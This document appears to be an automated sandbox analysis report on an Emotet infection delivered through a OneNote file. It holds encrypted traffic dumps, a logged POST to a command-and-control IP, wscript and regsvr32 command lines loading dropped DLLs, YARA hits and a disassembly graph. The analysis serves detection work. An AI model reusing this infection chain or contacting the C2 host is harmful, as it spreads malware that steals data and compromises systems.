                                                                                                Data Ascii: 4000a,2cnKie99bA$!QQP8.>k]!wx<yHH3bkD6&4SMS.Ez32<}|&<hxM2bk:5zmKu`?+Q=<X cYiaa7s(LeKIIa3yA0!,-=bk|1>ofu[i~,$"Qq`H ktcmS(Fr
                                                                                                2023-03-17 08:06:26 UTC280INData Raw: 8e 2a c8 46 c3 10 71 78 78 d2 f3 2c bb e7 19 c9 e7 00 b8 af 27 8d 3d 40 55 33 d8 7d 55 7e cf 38 30 22 ee 4a 1f 62 fa 81 1e 0b ca 94 bd b4 70 d2 e0 21 b9 7a 59 0b bd 23 2b 2b e2 73 41 33 7d f9 bf 76 ce b3 60 f3 28 6b 65 71 b4 97 55 ca 41 43 35 3c fa e4 18 c9 3c 68 30 68 d8 39 c4 c1 77 46 2b 8b e5 40 ad 7a 53 26 cc 73 60 6b a3 ef 41 b1 3f 2b 71 2b c8 18 ed fd 35 5c 14 d2 b8 4c b0 21 51 42 8e 4c 32 62 6b 49 ea 8d 7c f1 a3 af 01 13 64 bb 20 25 9a c6 85 45 e6 9b b2 84 71 50 19 a7 c6 59 3c 80 b2 47 af bd 78 c3 fc 2e e0 c5 db 60 34 7a 53 6e ce fc 0c da 9c 4f e5 39 3f 2b 39 e9 1d 67 55 3c fa 14 18 29 74 e3 44 05 29 0a b7 8c 63 3d 23 ff 81 a8 79 f1 8f 6f cc 6c 4c 1a a1 00 75 70 b6 58 69 2b c8 38 15 35 27 30 bf b5 4c e3 b4 05 b1 42 34 48 7b e9 c7 24 89 64 35 7a 17
                                                                                                Data Ascii: *Fqxx,'=@U3}U~80"Jbp!zY#++sA3}v`(keqUAC5<<h0h9wF+@zS&s`kA?+q+5\L!QBL2bkI|d %EqPY<Gx.`4zSnO9?+9gU<)tD)c=#yolLupXi+85'0LB4H{$d5z
                                                                                                2023-03-17 08:06:26 UTC288INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC288INData Raw: 34 30 30 30 0d 0a a9 be 01 a7 ef 2e 75 f6 7b 2b 71 e3 34 53 1a 03 a8 63 84 da 82 c8 1f aa 04 52 c3 aa f2 88 68 89 34 74 b4 0f 43 42 87 03 e1 d2 5d 7b fc b9 a7 8e fa 27 51 ca 70 64 b6 3d 1c ff 7d 45 2d e6 14 a2 d5 20 72 59 ac 45 79 b7 6d 99 b5 e1 00 1f a5 3b 82 f9 a2 7c 2f 91 b2 62 41 82 50 64 61 f3 79 49 fd 88 37 a8 14 52 b5 3d 23 3f e2 09 bc ef 70 6a da 63 55 bc 09 4b a3 2e 45 0a f7 6a f8 6a 86 06 25 69 40 78 3c d8 79 78 7e dc 51 42 b5 0d 23 80 35 00 61 0f 70 6a 3e af 00 27 c5 1e 38 89 5b 20 77 aa 04 72 f7 f5 85 3c fa 3d 2c d0 79 78 bb 6c 79 c9 71 a8 00 aa 2a 89 29 60 f2 3f 43 34 73 37 44 92 4d 7b 63 b2 7a 3b fc 6e 81 40 fc fd 3c 68 bd 1c 2c bb 1a de ae c3 71 58 60 7c 94 ff e0 11 25 01 40 de 45 bc 01 43 a1 2e 75 71 bc ef 51 3f 82 8f f9 b8 39 fb d0 71 fb
                                                                                                Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                                2023-03-17 08:06:26 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                                Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                                2023-03-17 08:06:26 UTC304INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                                Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.449689182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2023-03-17 08:07:23 UTC310OUTPOST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Length: 0
                                                                                                Host: 182.162.143.56
                                                                                                2023-03-17 08:07:25 UTC310INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 17 Mar 2023 08:06:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                2023-03-17 08:07:25 UTC310INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:09:05:56
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one
                                                                                                Imagebase:0xeb0000
                                                                                                File size:1676072 bytes
                                                                                                MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:09:06:22
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                Imagebase:0x1360000
                                                                                                File size:147456 bytes
                                                                                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.389837714.0000000005222000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.401747344.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.401867106.0000000005166000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:09:06:26
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                                                                                                Imagebase:0x1260000
                                                                                                File size:20992 bytes
                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:09:06:26
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline: "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                                                                                                Imagebase:0x7ff787110000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:09:06:29
                                                                                                Start date:17/03/2023
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"
                                                                                                Imagebase:0x7ff787110000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.4%
                                                                                                  Dynamic/Decrypted Code Coverage:8.9%
                                                                                                  Signature Coverage:7.1%
                                                                                                  Total number of Nodes:282
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 8532 e04214 8533 e04256 8532->8533 8536 e13988 8533->8536 8535 e044c6 8538 e13a29 8536->8538 8537 e13acc CreateProcessW 8537->8535 8538->8537 8539 180001138 8540 180001141 __scrt_release_startup_lock 8539->8540 8542 180001145 8540->8542 8543 1800063cc 8540->8543 8544 1800063ec 8543->8544 8573 180006403 8543->8573 8545 1800063f4 8544->8545 8546 18000640a 8544->8546 8604 1800086f4 8545->8604 8574 180009cd8 8546->8574 8558 180006481 8561 1800086f4 __std_exception_copy 11 API calls 8558->8561 8559 180006499 8560 1800061a4 47 API calls 8559->8560 8564 1800064b5 8560->8564 8562 180006486 8561->8562 8610 18000878c 8562->8610 8566 1800064e7 8564->8566 8567 180006500 8564->8567 8572 1800064bb 8564->8572 8565 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8565->8573 8568 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8566->8568 8570 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8567->8570 8569 1800064f0 8568->8569 8571 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8569->8571 8570->8572 8571->8573 8572->8565 8573->8542 8575 180009ce5 8574->8575 8579 18000640f 8574->8579 8616 180007e8c 8575->8616 8580 1800093bc GetModuleFileNameW 8579->8580 8581 180009401 GetLastError 8580->8581 8582 180009415 8580->8582 8974 180008668 8581->8974 8584 1800091fc 47 API calls 8582->8584 8586 180009443 8584->8586 8585 18000940e 8587 1800010b0 _log10_special 8 API calls 8585->8587 8591 180009454 8586->8591 8979 18000a5f0 8586->8979 8590 180006426 8587->8590 8592 1800061a4 8590->8592 8982 1800092a0 8591->8982 8594 1800061e2 8592->8594 8596 18000624e 8594->8596 8996 18000a088 8594->8996 8595 18000633f 8598 18000636c 8595->8598 8596->8595 8597 18000a088 47 API calls 8596->8597 8597->8596 8599 1800063bc 8598->8599 8600 180006384 8598->8600 8599->8558 8599->8559 8600->8599 8601 180008714 _invalid_parameter_noinfo 11 API calls 8600->8601 8602 1800063b2 8601->8602 8603 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8602->8603 8603->8599 8605 180007f30 __std_exception_copy 11 API calls 8604->8605 8606 1800063f9 8605->8606 8607 1800085b8 8606->8607 9000 180008450 8607->9000 8611 180008791 HeapFree 8610->8611 8615 1800087c0 8610->8615 8612 1800087ac GetLastError 8611->8612 8611->8615 8613 1800087b9 Concurrency::details::SchedulerProxy::DeleteThis 8612->8613 8614 1800086f4 __std_exception_copy 9 API calls 8613->8614 8614->8615 8615->8573 8617 180007eb8 FlsSetValue 8616->8617 8618 180007e9d FlsGetValue 8616->8618 8620 180007eaa 8617->8620 8621 180007ec5 8617->8621 8619 180007eb2 8618->8619 8618->8620 8619->8617 8623 180007eb0 8620->8623 8671 180006e28 8620->8671 8659 180008714 8621->8659 8636 1800099b0 8623->8636 8627 180007ef2 FlsSetValue 8630 180007efe FlsSetValue 8627->8630 8631 180007f10 8627->8631 8628 180007ee2 FlsSetValue 8629 180007eeb 8628->8629 8632 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8629->8632 8630->8629 8666 180007b24 8631->8666 8632->8620 8799 180009c20 8636->8799 8638 1800099e5 8814 1800096b0 8638->8814 8641 180009a02 8641->8579 8643 180009a13 8644 180009a1b 8643->8644 8646 180009a2a 8643->8646 8645 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8644->8645 8645->8641 8646->8646 8828 180009d54 8646->8828 8649 180009b26 8650 1800086f4 __std_exception_copy 11 API calls 8649->8650 8651 180009b2b 8650->8651 8653 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8651->8653 8652 180009b81 8655 180009be8 8652->8655 8839 1800094e0 8652->8839 8653->8641 8654 180009b40 8654->8652 8657 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8654->8657 8656 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8655->8656 8656->8641 8657->8652 8664 180008725 _invalid_parameter_noinfo 8659->8664 8660 180008776 8663 1800086f4 __std_exception_copy 10 API calls 8660->8663 8661 18000875a RtlAllocateHeap 8662 180007ed4 8661->8662 8661->8664 8662->8627 8662->8628 8663->8662 8664->8660 8664->8661 8680 18000abf8 8664->8680 8689 1800079fc 8666->8689 8703 18000acb8 8671->8703 8683 18000ac38 8680->8683 8688 180008160 EnterCriticalSection 8683->8688 8701 180008160 EnterCriticalSection 8689->8701 8737 18000ac70 8703->8737 8742 180008160 EnterCriticalSection 8737->8742 8800 180009c43 8799->8800 8802 180009c4d 8800->8802 8854 180008160 EnterCriticalSection 8800->8854 8803 180009cbf 8802->8803 8805 180006e28 __GetCurrentState 47 API calls 8802->8805 8803->8638 8807 180009cd7 8805->8807 8809 180009d2a 8807->8809 8811 180007e8c 52 API calls 8807->8811 8809->8638 8812 180009d14 8811->8812 8813 1800099b0 67 API calls 8812->8813 8813->8809 8855 1800091fc 8814->8855 8817 1800096e2 8819 1800096e7 GetACP 8817->8819 8820 1800096f7 8817->8820 8818 1800096d0 GetOEMCP 8818->8820 8819->8820 8820->8641 8821 18000b4c4 8820->8821 8822 18000b50f 8821->8822 8826 18000b4d3 _invalid_parameter_noinfo 8821->8826 8824 1800086f4 __std_exception_copy 11 API calls 8822->8824 8823 18000b4f6 HeapAlloc 8825 18000b50d 8823->8825 8823->8826 8824->8825 8825->8643 8826->8822 8826->8823 8827 18000abf8 _invalid_parameter_noinfo 2 API calls 8826->8827 8827->8826 8829 1800096b0 49 API calls 8828->8829 8830 180009d81 8829->8830 8831 180009ed7 8830->8831 8833 180009dbe IsValidCodePage 8830->8833 8838 180009dd8 __GetCurrentState 8830->8838 8832 1800010b0 _log10_special 8 API calls 8831->8832 8834 180009b1d 8832->8834 8833->8831 8835 180009dcf 8833->8835 8834->8649 8834->8654 8836 180009dfe GetCPInfo 8835->8836 8835->8838 8836->8831 8836->8838 8887 1800097c8 8838->8887 8973 180008160 EnterCriticalSection 8839->8973 8856 180009220 8855->8856 8862 18000921b 8855->8862 8857 180007db8 __GetCurrentState 47 API calls 8856->8857 8856->8862 8858 18000923b 8857->8858 8863 18000b524 8858->8863 8862->8817 8862->8818 8864 18000b539 8863->8864 8866 18000925e 8863->8866 8864->8866 8871 18000bfb4 8864->8871 8867 18000b590 8866->8867 8868 18000b5a5 8867->8868 8869 18000b5b8 8867->8869 8868->8869 8884 180009d38 8868->8884 8869->8862 8872 180007db8 __GetCurrentState 47 API calls 8871->8872 8873 18000bfc3 8872->8873 8875 18000c00e 8873->8875 8883 180008160 EnterCriticalSection 8873->8883 8875->8866 8885 180007db8 __GetCurrentState 47 API calls 8884->8885 8886 180009d41 8885->8886 8888 180009805 GetCPInfo 8887->8888 8897 1800098fb 8887->8897 8889 180009818 8888->8889 8888->8897 8898 18000caa4 8889->8898 8890 1800010b0 _log10_special 8 API calls 8891 18000999a 8890->8891 8891->8831 8897->8890 8899 1800091fc 47 API calls 8898->8899 8900 18000cae6 8899->8900 8918 18000a0c4 8900->8918 8919 18000a0cd MultiByteToWideChar 8918->8919 8975 180007f30 __std_exception_copy 11 API calls 8974->8975 8976 180008675 Concurrency::details::SchedulerProxy::DeleteThis 8975->8976 8977 180007f30 __std_exception_copy 11 API calls 8976->8977 8978 180008697 8977->8978 8978->8585 8980 18000a3dc 5 API calls 8979->8980 8981 18000a610 8980->8981 8981->8591 8983 1800092df 8982->8983 8985 1800092c4 8982->8985 8984 1800092e4 8983->8984 8986 18000a154 WideCharToMultiByte 8983->8986 8984->8985 8988 1800086f4 __std_exception_copy 11 API calls 8984->8988 8985->8585 8987 18000933b 8986->8987 8987->8984 8989 180009342 GetLastError 8987->8989 8990 18000936d 8987->8990 8988->8985 8991 180008668 11 API calls 8989->8991 8993 18000a154 WideCharToMultiByte 8990->8993 8992 18000934f 8991->8992 8994 1800086f4 __std_exception_copy 11 API calls 8992->8994 8995 180009394 8993->8995 8994->8985 8995->8985 8995->8989 8997 18000a014 8996->8997 8998 1800091fc 47 API calls 8997->8998 8999 18000a038 8998->8999 8999->8594 9001 18000847b 9000->9001 9008 1800084ec 9001->9008 9004 1800084c5 9006 180006ef0 _invalid_parameter_noinfo 47 API calls 9004->9006 9007 1800084da 9004->9007 9006->9007 9007->8573 9033 180008234 9008->9033 9013 1800084a2 9013->9004 9018 180006ef0 9013->9018 9019 180006f48 9018->9019 9020 180006eff GetLastError 9018->9020 9019->9004 9021 180006f14 9020->9021 9022 180007ff8 _invalid_parameter_noinfo 16 API calls 9021->9022 9023 180006f2e SetLastError 9022->9023 9023->9019 9024 180006f51 9023->9024 9025 180006e28 __GetCurrentState 45 API calls 9024->9025 9026 180006f56 9025->9026 9027 180006ef0 _invalid_parameter_noinfo 45 API calls 9026->9027 9028 180006f77 9027->9028 9063 18000b558 9028->9063 9034 18000828b 9033->9034 9035 180008250 GetLastError 9033->9035 9034->9013 9039 1800082a0 9034->9039 9036 180008260 9035->9036 9046 180007ff8 9036->9046 9040 1800082d4 9039->9040 9041 1800082bc GetLastError SetLastError 9039->9041 9040->9013 9042 1800085d8 IsProcessorFeaturePresent 9040->9042 9041->9040 9043 1800085eb 9042->9043 9044 1800082ec __GetCurrentState 14 API calls 9043->9044 9045 180008606 GetCurrentProcess TerminateProcess 9044->9045 9047 180008032 FlsSetValue 9046->9047 9048 180008017 FlsGetValue 9046->9048 9049 180008024 SetLastError 9047->9049 9051 18000803f 9047->9051 9048->9049 9050 18000802c 9048->9050 9049->9034 9050->9047 9052 180008714 _invalid_parameter_noinfo 11 API calls 9051->9052 9053 18000804e 9052->9053 9054 18000806c FlsSetValue 9053->9054 9055 18000805c FlsSetValue 9053->9055 9057 180008078 FlsSetValue 9054->9057 9058 18000808a 9054->9058 9056 180008065 9055->9056 9060 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9056->9060 9057->9056 9059 180007b24 _invalid_parameter_noinfo 11 API calls 9058->9059 9061 180008092 9059->9061 9060->9049 9062 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9061->9062 9062->9049 9064 18000b571 9063->9064 9065 180006f9f 9063->9065 9064->9065 9066 18000bfb4 _invalid_parameter_noinfo 47 API calls 9064->9066 9067 18000b5c4 9065->9067 9066->9065 9068 180006faf 9067->9068 9069 18000b5dd 9067->9069 9068->9004 9069->9068 9070 180009d38 _invalid_parameter_noinfo 47 API calls 9069->9070 9070->9068 9071 180010a8e ExitProcess 9074 180014c90 LoadStringW LoadStringW 9071->9074 9083 1800109d0 LoadCursorW RegisterClassExW 9074->9083 9076 180014cec 9084 180010910 CreateWindowExW 9076->9084 9078 180014d02 GetMessageW 9079 180010ab3 9078->9079 9080 180014d19 TranslateAcceleratorW 9078->9080 9081 180014cfa 9080->9081 9082 180014d2f TranslateMessage DispatchMessageW 9080->9082 9081->9078 9081->9079 9082->9081 9083->9076 9085 1800109a1 ShowWindow UpdateWindow 9084->9085 9086 18001099d 9084->9086 9085->9086 9086->9081 9087 e080cc 9089 e080f3 9087->9089 9088 e082ba 9089->9088 9091 e1e9e8 9089->9091 9094 e08bc8 9091->9094 9093 e1eab4 9093->9089 9096 e08c02 9094->9096 9095 e08eb8 9095->9093 9096->9095 9097 e08d6f Process32FirstW 9096->9097 9097->9096 9098 9e0000 9103 9e015a 9098->9103 9099 9e08eb 9100 9e033f GetNativeSystemInfo 9100->9099 9101 9e0377 VirtualAlloc 9100->9101 9102 9e0395 VirtualAlloc 9101->9102 9107 9e03aa 9101->9107 9102->9107 9103->9099 9103->9100 9104 9e0873 9104->9099 9105 9e08c6 RtlAddFunctionTable 9104->9105 9105->9099 9106 9e084b VirtualProtect 9106->9107 9107->9104 9107->9106 9107->9107

                                                                                                  Executed Functions

                                                                                                  Function 009E0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 9e0000-9e029a call 9e091c * 2 13 9e0905 0->13 14 9e02a0-9e02a4 0->14 15 9e0907-9e091a 13->15 14->13 16 9e02aa-9e02ae 14->16 16->13 17 9e02b4-9e02b8 16->17 17->13 18 9e02be-9e02c5 17->18 18->13 19 9e02cb-9e02dc 18->19 19->13 20 9e02e2-9e02eb 19->20 20->13 21 9e02f1-9e02fc 20->21 21->13 22 9e0302-9e0312 21->22 23 9e033f-9e0371 GetNativeSystemInfo 22->23 24 9e0314-9e031a 22->24 23->13 25 9e0377-9e0393 VirtualAlloc 23->25 26 9e031c-9e0324 24->26 27 9e03aa-9e03ae 25->27 28 9e0395-9e03a8 VirtualAlloc 25->28 29 9e032c-9e032d 26->29 30 9e0326-9e032a 26->30 32 9e03dc-9e03e3 27->32 33 9e03b0-9e03c2 27->33 28->27 31 9e032f-9e033d 29->31 30->31 31->23 31->26 35 9e03fb-9e0417 32->35 36 9e03e5-9e03f9 32->36 34 9e03d4-9e03d8 33->34 37 9e03da 34->37 38 9e03c4-9e03d1 34->38 39 9e0458-9e0465 35->39 40 9e0419-9e041a 35->40 36->35 36->36 37->35 38->34 41 9e046b-9e0472 39->41 42 9e0537-9e0542 39->42 43 9e041c-9e0422 40->43 41->42 46 9e0478-9e0485 41->46 44 9e0548-9e0559 42->44 45 9e06e6-9e06ed 42->45 47 9e0448-9e0456 43->47 48 9e0424-9e0446 43->48 49 9e0562-9e0565 44->49 51 9e07ac-9e07c3 45->51 52 9e06f3-9e0707 45->52 46->42 50 9e048b-9e048f 46->50 47->39 47->43 48->47 48->48 53 9e055b-9e055f 49->53 54 9e0567-9e0574 49->54 55 9e051b-9e0525 50->55 58 9e087a-9e088d 51->58 59 9e07c9-9e07cd 51->59 56 9e070d 52->56 57 9e07a9-9e07aa 52->57 53->49 60 9e060d-9e0619 54->60 61 9e057a-9e057d 54->61 64 9e052b-9e0531 55->64 65 9e0494-9e04a8 55->65 62 9e0712-9e0736 56->62 57->51 80 9e088f-9e089a 58->80 81 9e08b3-9e08ba 58->81 63 9e07d0-9e07d3 59->63 72 9e061f 60->72 73 9e06e2-9e06e3 60->73 61->60 68 9e0583-9e059b 61->68 89 9e0738-9e073e 62->89 90 9e0796-9e079f 62->90 70 9e085f-9e086d 63->70 71 9e07d9-9e07e9 63->71 64->42 64->50 66 9e04cf-9e04d3 65->66 67 9e04aa-9e04cd 65->67 76 9e04d5-9e04e1 66->76 77 9e04e3-9e04e7 66->77 75 9e0518-9e0519 67->75 68->60 78 9e059d-9e059e 68->78 70->63 74 9e0873-9e0874 70->74 82 9e080d-9e080f 71->82 83 9e07eb-9e07ed 71->83 84 9e0625-9e0648 72->84 73->45 74->58 75->55 85 9e0511-9e0515 76->85 87 9e04fe-9e0502 77->87 88 9e04e9-9e04fc 77->88 86 9e05a0-9e0605 78->86 91 9e08ab-9e08b1 80->91 94 9e08bc-9e08c4 81->94 95 9e08eb-9e0903 81->95 96 9e0822-9e082b 82->96 97 9e0811-9e0820 82->97 92 9e07ef-9e07f9 83->92 93 9e07fb-9e080b 83->93 113 9e064a-9e064b 84->113 114 9e06b2-9e06b7 84->114 85->75 86->86 99 9e0607 86->99 87->75 106 9e0504-9e050e 87->106 88->85 100 9e0748-9e0754 89->100 101 9e0740-9e0746 89->101 90->62 105 9e07a5-9e07a6 90->105 91->81 102 9e089c-9e08a8 91->102 98 9e082e-9e083d 92->98 93->98 94->95 104 9e08c6-9e08e9 RtlAddFunctionTable 94->104 95->15 96->98 97->98 107 9e083f-9e0845 98->107 108 9e084b-9e085c VirtualProtect 98->108 99->60 111 9e0756-9e0757 100->111 112 9e0764-9e0776 100->112 110 9e077b-9e078d 101->110 102->91 104->95 105->57 106->85 107->108 108->70 110->90 125 9e078f-9e0794 110->125 116 9e0759-9e0762 111->116 112->110 117 9e064e-9e0651 113->117 118 9e06ce-9e06d8 114->118 119 9e06b9-9e06bd 114->119 116->112 116->116 121 9e065b-9e0666 117->121 122 9e0653-9e0659 117->122 118->84 123 9e06de-9e06df 118->123 119->118 124 9e06bf-9e06c3 119->124 127 9e0668-9e0669 121->127 128 9e0676-9e0688 121->128 126 9e068d-9e06a3 